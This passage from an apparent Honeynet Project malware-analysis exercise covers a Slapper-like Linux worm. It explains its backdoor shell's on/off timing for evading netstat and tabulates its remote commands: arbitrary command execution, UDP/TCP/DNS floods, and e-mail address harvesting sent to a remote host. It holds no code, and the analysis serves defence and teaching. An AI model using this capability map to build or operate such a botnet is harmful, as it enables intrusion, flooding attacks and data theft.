The accept() function requires that the last parameter be a pointer to an integer that is initially set to the size of the struct sockaddr structure. In this case our buddy aion <aion@ukr.net>; is not passing a pointer but an integer directly. You need to be more careful when coding <aion@ukr.net>.

Now, update does not provide a shell on demand on TCP port 1052 of the host running the compiled version of .update.c at all times: the server is programmed to listen for just 10 seconds and the shuts down for 5 minutes. See next question for details.

There isn't really anything else to say about .update.c. It is a very small program that can be understood in 2 minutes. It is pretty obvious what it does.

5.11. Question 11

Q (Bonus Question) What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?

A: SLEEPTIME is a symbol defined at the beginning of the file as "300", and UPTIME is another symbol defined as "10". As I mentioned in the previous question, when update is run, it will open TCP port 1052 and will provide a shell on demand for UPTIME seconds. After UPTIME seconds have passed update will shut down the TCP server for SLEEPTIME seconds.

My guess is that this feature is provided to prevent system administrators from running the netstat and finding that a strange process is running on a non-standard port.

A. Files

The following files where generated during this Scan of the Month:

Worm source code: .unlock.c and .update.c. I am not including these files here since it is very easy to generate them: just download the file provided for Scan of the Month November 2002 and follow the procedure I presented in Section 2
control.c: program that allows to control the worm analyzed in this document. Please note that not all commands are implemented, and that some commands are have bugs in the worm source, so they might not work at all.
XML sources for this document: this HTML document was generated using DocBook XML. This directory contains all the files used in the generation of this document.

B. Worm Commands

The following table contains the worm commands that are provided as a backdoor. The source code contains a few comments that give an idea of what some of the commands do. Other commands required study of the source code to be able to figure out what they do. I tested some of the commands by writing a small program that controlled remotely the backdoor.

Table B.1. Worm Commands

Command Code	Function Performed	Comments
0x20	Get information	Information about current status of the worm (version, IP address, etc.)
0x21	Open a bounce	Related to the peer-to-peer network. I believe it allows the worm to proxy connections for another host
0x22	Close a bounce
0x23	Send message to a bounce
0x24	Run a command	The received packet includes, in addition to the 0x24 command code, the command that the attacker wants the infected machine to execute. The worm has code to send back the output of the command to a programmed (also in the received packet) IP address. However, there is a critical bug in the code that makes a forked worm process crash when it tries to zero 3000 bytes in an array that only holds about 12 bytes. The bug is due to declaration of a variable with the same name of another in another context, making it invisible from the current scope. I tested this code and the command is executed, although nothing is returned because of the bug.
0x25	Not implemented, does nothing
0x26	Route	Seems related to management of the peer-to-peer network
0x27	Not implemented, does nothing
0x28	List	Apparently, used to get a list of links to other infected machines. Seems related to management/monitoring of the peer-to-peer network
0x29	UDP flood	Starts a Denial of Service against another host. UDP is used and the IP address and port to use, as well as the duration of the attack, are specified in the packet. I tested this and it works.
0x2a	TCP flood	Starts a Denial of Service attack against another host. TCP is used and the IP address and port to use, as well as the duration of the attack, are specified in the packet. I tested this at it works.
0x2b	IPv6 TCP flood	Starts a Denial of Service attack against another host. This is for IPv6. It is not enabled in the worm source code (disabled with a #undef.)
0x2c	DNS flood	Starts a Denial of Service attack against a DNS server. DNS requests are sent. The DNS server to use, as well as the duration of the attack, are specified in the packet. I tested this and the DNS query performed is broken.
0x2d	E-mail scan	Runs find / -type f and searches every file found for e-mail addresses. Sends the addresses it finds to UDP port `ESCANPORT` (defined as 10100 at the beginning of the file) of a host specified in the incoming packet.
0x70	Incoming client	Handles registration of new infected machine
0x71	Receive the list
0x72	Send the list
0x73	Get my IP
0x74	Transmit their IP	Sends the IP address of the incoming client to other registered clients
0x41 to 0x47	Relay to client	Resends received packet to all registered clients

C. References

Information about the OpenSSL vulnerability exploited by the worm:
- Advisory from CERT: CERT Advisory CA-2002-23 Multiple Vulnerabilities In OpenSSL.
- Bugtraq information: OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability.
Media coverage of the worm:
- A Wired article: Linux Worm Hits the Network
- A CNET article: Slapper worm smarting less.
Understanding of the TCP/IP protocols and of Unix network programming using the BSD sockets API is necessary to understand a worm like the one I analyzed in this paper. The following are my favorite books on these topics:
- Stevens, W.R. TCP/IP Illustrated Vol 1. 1994 Addison Wesley.
- Stevens, W.R. Unix Network Programming Vol 1. 2nd Ed. 1998 Prentice Hall.

D. Thanks

Thanks to ...

Chapu for being so patient while her husband was lost in bits, bytes and lines of C source code, and for bringing so much joy to my life. This is dedicated to you; you deserve it a thousand times.
The Honeynet Project for coming up with these highly educational exercises, and for taking the time to go over all the submissions. That must be a lot of work! Keep 'em coming!